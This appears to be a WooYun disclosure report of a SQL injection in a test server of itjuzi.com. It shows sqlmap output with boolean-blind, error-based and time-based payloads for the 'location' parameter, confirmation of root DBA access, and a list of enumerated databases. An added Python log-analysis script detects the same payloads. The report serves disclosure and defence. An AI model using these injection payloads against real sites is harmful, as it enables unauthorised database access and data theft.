WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
2015-12-16: Details sent to the vendor, awaiting vendor response
2015-12-16: Vendor confirmed; details disclosed only to the vendor
2015-12-26: Details disclosed to core white hats and relevant domain experts
2016-01-05: Details disclosed to regular white hats
2016-01-15: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public
It's getting cold...

Request:
GET /tag?id=651&location=* HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://mockup.itjuzi.com:80/
Cookie: cisession=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2293b8cb1d511f9392264f1a5f2606129b%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22218.205.17.133%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1450255709%3B%7D9257462ac115699729066f98f009bcbc
Host: mockup.itjuzi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The location parameter is injectable.

Took a look at the itjuzi database.

Checked privileges: root user with DBA privileges.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://mockup.itjuzi.com:80/tag?id=651&location=-5463' OR 6738=6738#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: http://mockup.itjuzi.com:80/tag?id=651&location=-4292' OR 1 GROUP BY CONCAT(0x716b7a7071,(SELECT (CASE WHEN (9723=9723) THEN 1 ELSE 0 END)),0x71767a6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: http://mockup.itjuzi.com:80/tag?id=651&location=' AND (SELECT * FROM (SELECT(SLEEP(5)))dbtn)#
---
[17:35:12] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 7
web application technology: PHP 5.4.13, Nginx
back-end DBMS: MySQL 5.0.12
[17:35:12] [INFO] testing if current user is DBA
[17:35:12] [INFO] fetching current user
[17:35:13] [WARNING] reflective value(s) found and filtering out
[17:35:13] [INFO] retrieved: root@%
current user is DBA: True
[17:35:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[17:35:14] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\mockup.itjuzi.com'

[*] shutting down at 17:35:14
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 322 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://mockup.itjuzi.com:80/tag?id=651&location=-5463' OR 6738=6738#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: http://mockup.itjuzi.com:80/tag?id=651&location=-4292' OR 1 GROUP BY CONCAT(0x716b7a7071,(SELECT (CASE WHEN (9723=9723) THEN 1 ELSE 0 END)),0x71767a6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: http://mockup.itjuzi.com:80/tag?id=651&location=' AND (SELECT * FROM (SELECT(SLEEP(5)))dbtn)#
---
[17:16:23] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 7
web application technology: PHP 5.4.13, Nginx
back-end DBMS: MySQL 5.0.12
[17:16:23] [INFO] fetching database names
[17:16:24] [INFO] the SQL query used returns 37 entries
[17:16:24] [INFO] retrieved: information_schema
[17:16:24] [INFO] retrieved: aidena
[17:16:25] [INFO] retrieved: apple
[17:16:25] [INFO] retrieved: apple_cn
[17:16:26] [INFO] retrieved: avgouzai
[17:16:26] [INFO] retrieved: bdxzjklt
[17:16:27] [INFO] retrieved: blog_chktips
[17:16:28] [INFO] retrieved: blogitjuzi
[17:16:28] [INFO] retrieved: cciehunhun
[17:16:29] [INFO] retrieved: chktips
[17:16:31] [INFO] retrieved: dear_there
[17:16:31] [INFO] retrieved: demo_chktips
[17:16:32] [INFO] retrieved: dengta
[17:16:32] [INFO] retrieved: dev_yahoo
[17:16:33] [INFO] retrieved: itjuzi
[17:16:33] [INFO] retrieved: itjuzidemo
[17:16:34] [INFO] retrieved: jutongshe
[17:16:34] [INFO] retrieved: kejiju
[17:16:35] [INFO] retrieved: kids_db
[17:16:35] [INFO] retrieved: letcodefly
[17:16:36] [INFO] retrieved: meximexi
[17:16:36] [INFO] retrieved: mysql
[17:16:37] [INFO] retrieved: mysqlslap
[17:16:37] [INFO] retrieved: nagios
[17:16:38] [INFO] retrieved: psdhere
[17:16:38] [INFO] retrieved: redmine
[17:16:39] [INFO] retrieved: seeker
[17:16:39] [INFO] retrieved: seeker_test
[17:16:40] [INFO] retrieved: sochips
[17:16:41] [INFO] retrieved: spider_article
[17:16:41] [INFO] retrieved: ssmli
[17:16:41] [INFO] retrieved: test
[17:16:42] [INFO] retrieved: tobshe
[17:16:42] [INFO] retrieved: touzishuju
[17:16:43] [INFO] retrieved: wp_new
[17:16:43] [INFO] retrieved: wp_new_2
[17:16:44] [INFO] retrieved: zangels
available databases [37]:
[*] aidena
[*] apple
[*] apple_cn
[*] avgouzai
[*] bdxzjklt
[*] blog_chktips
[*] blogitjuzi
[*] cciehunhun
[*] chktips
[*] dear_there
[*] demo_chktips
[*] dengta
[*] dev_yahoo
[*] information_schema
[*] itjuzi
[*] itjuzidemo
[*] jutongshe
[*] kejiju
[*] kids_db
[*] letcodefly
[*] meximexi
[*] mysql
[*] mysqlslap
[*] nagios
[*] psdhere
[*] redmine
[*] seeker
[*] seeker_test
[*] sochips
[*] spider_article
[*] ssmli
[*] test
[*] tobshe
[*] touzishuju
[*] wp_new
[*] wp_new_2
[*] zangels

[17:16:44] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 295 times
[17:16:44] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\mockup.itjuzi.com'

[*] shutting down at 17:16:44
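The sqlmap output above confirms three techniques against the location parameter (boolean-based blind, error-based and time-based blind) and records 295 HTTP 500 responses during the run. From a defender's side, both are visible in the web server's access log. The following script is an added example and is not code from the report or from the vendor: it parses nginx "combined" log lines, percent-decodes each query parameter, matches the three payload shapes that sqlmap reported, and separately counts 5xx responses per client, because the lone-quote probes that cause errors do not contain any recognizable SQL. The log lines, the client address 203.0.113.10 and the error threshold are constructed for the example; the payload strings are the ones from the report.

```python
# Added example (not part of the WooYun report): detection logic for the
# three injection techniques sqlmap confirmed against the `location`
# parameter, run over constructed nginx access-log lines.  The log lines,
# the client IP 203.0.113.10 and the 5xx threshold are assumptions made
# for this example; the payloads are the ones from the report.
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# nginx "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]+" (?P<status>\d{3}) '
)

# One regex per technique named in the sqlmap output.  They are applied
# to the percent-decoded parameter value, not to the raw URI.
PATTERNS = {
    # -5463' OR 6738=6738#  : quote, boolean operator, numeric tautology
    "boolean_blind": re.compile(r"'\s*(?:OR|AND)\s+\d+\s*=\s*\d+", re.I),
    # ... GROUP BY CONCAT(...FLOOR(RAND(0)*2)) HAVING MIN(0)# : duplicate-key error trick
    "error_based": re.compile(r"GROUP\s+BY\s+CONCAT\(.*FLOOR\(RAND\(0\)\*2\)", re.I | re.S),
    # ' AND (SELECT * FROM (SELECT(SLEEP(5)))dbtn)# : delay probe
    "time_blind": re.compile(r"\bSLEEP\(\s*\d+\s*\)", re.I),
}

# Constructed sample log (assumption): one benign request, one syntax-breaking
# probe that produced a 500, and one request per technique from the report.
SAMPLE_LOG = [
    '203.0.113.10 - - [16/Dec/2015:17:16:20 +0800] "GET /tag?id=651&location=beijing HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [16/Dec/2015:17:16:21 +0800] "GET /tag?id=651&location=651%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [16/Dec/2015:17:16:23 +0800] "GET /tag?id=651&location=-5463%27%20OR%206738%3D6738%23 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [16/Dec/2015:17:16:24 +0800] "GET /tag?id=651&location=-4292%27%20OR%201%20GROUP%20BY%20CONCAT(0x716b7a7071,(SELECT%20(CASE%20WHEN%20(9723%3D9723)%20THEN%201%20ELSE%200%20END)),0x71767a6271,FLOOR(RAND(0)*2))%20HAVING%20MIN(0)%23 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [16/Dec/2015:17:16:30 +0800] "GET /tag?id=651&location=%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))dbtn)%23 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def classify_query(uri):
    """Return {(param, technique)} for every decoded query value that matches a pattern."""
    hits = set()
    # parse_qsl percent-decodes values, so %27 -> ' and %23 -> # before matching
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        for label, rx in PATTERNS.items():
            if rx.search(value):
                hits.add((name, label))
    return hits


def analyze(lines):
    """Parse access-log lines; return (alerts, per-client 5xx counts)."""
    alerts, errors = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the pipeline
        if m["status"].startswith("5"):
            errors[m["ip"]] += 1
        for param, technique in sorted(classify_query(m["uri"])):
            alerts.append({"ip": m["ip"], "param": param,
                           "technique": technique, "status": int(m["status"])})
    return alerts, errors


def noisy_clients(errors, threshold):
    """Clients whose 5xx count reaches the threshold.  This catches probes the
    patterns miss (the lone-quote request above); the 295 errors in the report
    would have tripped any sane threshold."""
    return sorted(ip for ip, n in errors.items() if n >= threshold)


if __name__ == "__main__":
    alerts, errors = analyze(SAMPLE_LOG)
    for a in alerts:
        print(f"{a['ip']} param={a['param']} technique={a['technique']} status={a['status']}")
    print("5xx-heavy clients:", noisy_clients(errors, threshold=2))
```

The two signals are deliberately independent: the pattern matcher names the parameter and technique, which is what the developer needs to fix the query, while the error counter is what would have fired first during a 322-request sqlmap run, before any payload shape was known. Whatever the detection, the root-cause fix is on the application side: the location value must be bound as a query parameter instead of concatenated into the SQL string.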
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-12-16 18:15
big thanks, test server, unlicensed ops management, already knocked out and fed to the dog.
None yet